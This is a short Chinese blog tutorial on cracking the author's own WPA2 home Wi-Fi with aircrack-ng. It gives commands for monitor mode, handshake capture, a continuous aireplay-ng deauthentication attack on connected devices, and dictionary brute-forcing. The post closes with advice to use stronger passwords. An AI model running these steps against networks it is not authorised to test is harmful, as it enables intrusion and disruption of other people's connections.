🌚

HI DARING

对自家wifi进行的一次测试

因为过程比较简单。所以就没有截图啦。简单讲一下思路过程吧。测试下你家的wifi

准备

一台能连wifi电脑(含网卡无论内置或者外置的都可以)
linux 系统

安装 aircrack-ng

我的运行环境:Ubuntu 1804 lts
打开终端

sudo apt install aircrack-ng

yes安装

查看本机的网卡

先提升权限输入密码
sudo su
查看网卡
airmon-ng

接下来你会看到你的网卡
这里我的网卡叫wlp2s0

开启监听

airmon-ng start <网卡名称>
airmon-ng start wlp2s0

这个时候你的网卡会被命名为监听状态下的网卡名称 为wlp2s0mon

具体看输出啦

扫描

airodump-ng <处于监听模式的网卡名称>
airodump-ng  wlp2s0mon

这个时候会有个列表
很多信息自己看看吧
大概介绍一下

BSSID: 无线 AP 的硬件地址
PWR: 信号强度,值是负数,绝对值越小表示信号越强
CH: 无线网络信道
ESSID: 无线网络的名称
ENC: 加密方式,我们要破解的是 WPA2 并且只能选择 wpa2的

第二个列表表示用户的连接信息

BSSID: 无线 AP 的硬件地址
STATION: 用户设备的硬件地址指连接手机或着其他设备的地址

扫到你的目标就 Ctrl-C 退出

获取握手包

airodump-ng -w <扫描结果保存的文件名> -c <无线网络信道> --bssid <目标无线 AP 的硬件地址> <处于监听模式的网卡名称>

刚刚扫描的时候左上角提示是这样的
CH 5 ][ Elapsed: 12 s ][ 2018-10-07 18:49

当你看到出现 ][ WPA handshake:<你的目标地址>
后就可以暂停了

握手包会保存在主目录里这里的主目录就是你的linux系统下用户的主目录 会找到一个命名为 <你的命名>-01.cap的文件 这个就是握手包

扫描过程中如果有用户设备尝试连接 Wi-Fi 时,我们就会拿到握手包。

选择步骤

在获取握手包的过程中 可以用手机连连WiFi或者对其进行攻击然后快速获取握手包
先打开另外一个终端

aireplay-ng -<攻击模式> <攻击次数> -a 无线 AP 硬件地址> -c <用户设备硬件地址> <处于监听模式的网卡名称>

攻击次数写0和模式都写 0 代表一直攻击

使用字典dictionary进行爆破wifi密码

aircrack-ng -w 密码字典 <包含握手包的 cap 文件>

字典dictionary自行准备吧 下一次我会写一篇关于简单字典制作的文章

然后 等结果啦
出现KEY FOUND! [ <wifi密码> ]的时候就是破解成功啦!
没有的话 就是失败了
如果成功了 你就改改家庭WiFi密码啦
在这里提醒下 提升家庭wifi密码复杂度 防止意外发生吧 还有 就是 家里装了监控的 密码也一样
还有 不要去干坏事哦 !

— Jan 30, 2019


Made with ❤ and Hexo.js at Earth.